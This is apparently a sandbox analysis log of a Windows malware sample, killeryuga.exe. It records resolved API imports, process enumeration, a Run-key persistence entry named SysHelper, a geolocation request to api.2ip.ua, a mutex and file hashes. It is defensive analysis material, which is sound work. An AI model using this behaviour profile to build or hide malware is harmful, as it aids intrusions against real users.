Get Address c:\windows\syswow64\user32.dll function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Get Address c:\windows\syswow64\user32.dll function = CharLowerA, address_out = 0x75493e75 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75364f2b True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75361252 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75364208 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7536359f True 2
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77610fcb True 9
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77609d35 True 4
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75365235 True 2
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x753879f9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x7536435f True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75363519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75361b00 True 2
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75a2d918 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x759f1ee5 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x759d1635 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x759cf48b True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75d59197 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x75d4b406 True 1
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x75d5f18e True 1
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x750926e0 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x770345bf True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7705ad1a True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7702d65e True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x770381ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75364435 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75365a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7536103d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x7537c807 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x75364259 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75361136 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75361986 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7536492b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x7538830d True 1
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x75364620 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x7538d556 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75361072 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75363ed3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75363f5c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75382b7a True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75365929 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x7538594d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x753659e2 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75379af0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75388baf True 1
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x7536168c True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x7536183e True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7538896c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7538828e True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75364c6b True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x753689b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75362d3c True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75383102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75365444 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75382a9d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x7537cf28 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x7537174d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x75365558 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x75364467 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x753634d5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x75491361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x75487136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x75489679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x76f6157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x76f5df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x76f614d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x76f6469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x76f5df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x76f77144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x76f6468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x76f5ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x76f5e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x76f5df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x76f62a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x76f646ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x76f5ca64 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x75ebe141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75e49ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75e51e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76077078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x75ec17bf True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x75beb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75bf7259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x75c186d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75c19d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x76b53eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x76b53ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x76b55dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x76b54af8 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x76b53e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x76b53f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b54642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x76b5fd6b True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x76b1311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x76b1b131 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x7502436b True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7503572c True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x74e9c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x753e410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x753e46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x753f6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x753e47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x7537eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75461408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Fn
User (1)
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
Window (1)
Operation Window Name Additional Information Success Count Logfile
Create LPCWSTRszTitle class_name = LPCWSTRszWindowClass, wndproc_parameter = 0 True 1
Fn
System (686)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 1
Fn
Sleep duration = 1 milliseconds (0.001 seconds) True 430
Fn
Get Time type = System Time, time = 2019-03-24 05:38:58 (UTC) True 1
Fn
Get Time type = Ticks, time = 94661 True 1
Fn
Get Time type = Performance Ctr, time = 14019660373 True 1
Fn
Get Time type = System Time, time = 2019-03-24 05:39:08 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 15117810092 True 1
Fn
Get Info type = Hardware Information True 249
Fn
Get Info type = Operating System True 1
Fn
Mutex (1)
Operation Additional Information Success Count Logfile
Create mutex_name = {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} True 1
Fn
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Network Behavior
HTTP Sessions (1)
Information Value
Total Data Sent 467 bytes
Total Data Received 7.32 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.32 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 554 True 1
Fn
Close Session - True 1
Fn
Process #19: killeryuga.exe
Information Value
ID #19
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1920 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:10, Reason: Child Process
Unmonitor End Time: 00:03:27, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0x5a4
Parent PID 0x780 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x590, 0x7B8, 0x790, 0x78C, 0x464, 0x7F4, 0x454, 0x7E0
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004068AB False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041551E False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00404045 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00414D7D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00408F6D False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040E452 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041D8B9, 0x0040BC4A False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040AA58 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00405A42 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0040943F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00424067, 0x0041F26F, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00418238, 0x0040F68F False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00402D3E, 0x00417990 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00401DB0 False
buffer 0x008F43B0 0x00923716 Marked Executable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00423043 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041C317 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041B267 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0041E4C3 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042CE51 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0042D244 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004281E0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00422D24 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004207EE False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x0043D44C, 0x00439A27, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00429D19, 0x00438910, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x004400B4 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00411BE0 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00412360 False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00437D77, 0x0040D690, ... False
killeryuga.exe 0x00400000 0x007CCFFF Content Changed - 32-bit 0x00420C00 False
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\5p5nrg~1\appdata\local\temp\temporary internet files\content.ie5\index.dat 32.00 KB MD5: ec386329eb6df438bfe57a573c340458
SHA1: 2a1cba6fecb1ffe38e8d6f649835c75e536f1aa4
SHA256: 65e3bb2968cfee7da74f2e619e60d44387eaa91acd34be75db9044012cc7a7ac
SSDeep: 3:qRFiJ2totWIltvl3sl5llwcugxmZhlldMBGlOnO/tld/txRt/r/i//llevRR//:qjyxEFpc5O+L1ji1IRX
False
c:\users\5p5nrg~1\appdata\local\temp\cookies\index.dat 16.00 KB MD5: d7a950fefd60dbaa01df2d85fefb3862
SHA1: 15740b197555ba8e162c37a60ba655151e3bebae
SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
SSDeep: 3:qRFiJ2totWIlXllll:qjyx
False
Host Behavior
File (6)
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Registry (2)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --AutoStart, type = REG_EXPAND_SZ True 1
Fn
Process (30)
Operation Process Additional Information Success Count Logfile
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows media player\pregnancy-infection-derby.exe desired_access = SYNCHRONIZE False 1
Fn
Module (465)
